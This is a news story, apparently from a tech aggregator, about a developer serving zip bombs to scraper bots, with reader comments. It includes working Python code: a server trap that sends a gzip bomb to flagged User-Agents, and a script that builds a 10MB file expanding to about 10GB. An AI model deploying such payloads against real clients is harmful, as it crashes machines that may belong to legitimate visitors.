Arthur T Knackerbracket has processed the following story:
Diallo says he made a 1MB file that decompresses into 1GB to disable bots trying to break into his system. He also has a 10MB-to-10GB compressed file for bots with more resources, ensuring that their memory is overwhelmed by this massive archive.
Here is how the defense works: when Diallo detects an offending bot, his server returns a 200 OK response and then serves up the zip bomb. The file’s metadata tells the bot that it is a compressed archive, so the bot opens it in an attempt to scrape as much information as possible. Because the file unpacks to at least 1GB, it overwhelms the memory of most simple bots, and even some advanced ones. If he faces a more capable scraper with a few gigabytes of memory to spare, he feeds it the 10GB zip bomb instead, which will most likely crash it.
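For illustration only, here is a minimal sketch of what such a server-side trap might look like, assuming a pre-built gzip payload named 10GB.gz (a way to build one is sketched further down) and a crude User-Agent heuristic for flagging bots. Both the filename and the heuristic are hypothetical placeholders, not Diallo's actual setup:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

BOMB_PATH = "10GB.gz"                                 # pre-built gzip bomb (hypothetical name)
SUSPICIOUS = ("sqlmap", "zgrab", "python-requests")   # placeholder bot heuristics

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        agent = self.headers.get("User-Agent", "").lower()
        if any(s in agent for s in SUSPICIOUS):
            # Pretend everything is fine, then hand the bot the bomb.
            # The Content-Encoding header tells the client the body is
            # gzip-compressed, so a naive scraper decompresses it in memory
            # and balloons to gigabytes.
            with open(BOMB_PATH, "rb") as f:
                payload = f.read()
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.send_header("Content-Encoding", "gzip")
            self.send_header("Content-Length", str(len(payload)))
            self.end_headers()
            self.wfile.write(payload)
        else:
            body = b"<html><body>Nothing to see here.</body></html>"
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), Handler).serve_forever()
```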
If you want to try this system for yourself, Diallo outlines how to create your own bot-targeting zip bomb on his blog. He notes that you should be careful when doing so, as you can potentially self-detonate (i.e., accidentally open the zip bomb) and crash your own server. Zip bombs are also not 100% effective, since there are ways to detect and disregard them. But for most simple bots, this should be more than enough to freeze the machine running the scraper and take it out of action, at least until the system is restarted.
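For anyone curious about the mechanics, one common way to build such a payload is to compress a long run of zeros, which gzip shrinks by roughly a factor of a thousand. The sketch below writes a file of around 10MB that expands to about 10GB; it is only an illustration of the general idea, not necessarily the exact recipe from Diallo's post:

```python
import gzip

# Build a small gzip file that expands to roughly 10 GiB of zeros.
# Zeros compress extremely well, so the file on disk stays around 10 MB.
CHUNK = b"\0" * (1024 * 1024)       # 1 MiB of zeros per write
TARGET_MIB = 10 * 1024              # 10 GiB uncompressed

with gzip.open("10GB.gz", "wb", compresslevel=9) as bomb:
    for _ in range(TARGET_MIB):
        bomb.write(CHUNK)
```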
(Score: 5, Funny) by psa on Monday May 05, @11:46PM (3 children)
It's very kind of people like this to provide sanity-checking tests to make tomorrow's bots more robust and intelligent about how they scrape content. This reminds me of a previous article about people creating navigational traps. An excellent way, really, to ensure that bot makers produce proper unique-content checks, depth and breadth checks on the site graph, and intelligent detection of when links are actually worth following.
This is, after all, exactly the service that bug finders, app store audits, and even heuristic antivirus provide.
(Score: 3, Touché) by Anonymous Coward on Monday May 05, @11:58PM
Just the usual cat and mouse, but it's going from Tom and Jerry to Itchy and Scratchy Land. Please turn off your flash!
(Score: 1, Interesting) by Anonymous Coward on Tuesday May 06, @02:29AM (1 child)
Indeed, and one wonders whether they have done this and tested this scenario. Or if they're even downloading large binary attachments.
Has this been validation-tested? Does crawling slow down after the bots hit a large zip? Does it slow more than proportionally to the download size? Has there been any testing at all, prior to large binary blobs being offered to the world?
Has there been any attempt to craft a maximally large dictionary for maximal memory consumption while decompressing, or is this solely about the written-to-disk size of the extracted object?
What is this idiot actually accomplishing? Does any part of this seem more advanced than what a middle schooler could do?
(Score: 2, Touché) by Anonymous Coward on Tuesday May 06, @12:36PM
Try reading the developer's linked blog post [idiallo.com], then get back to us.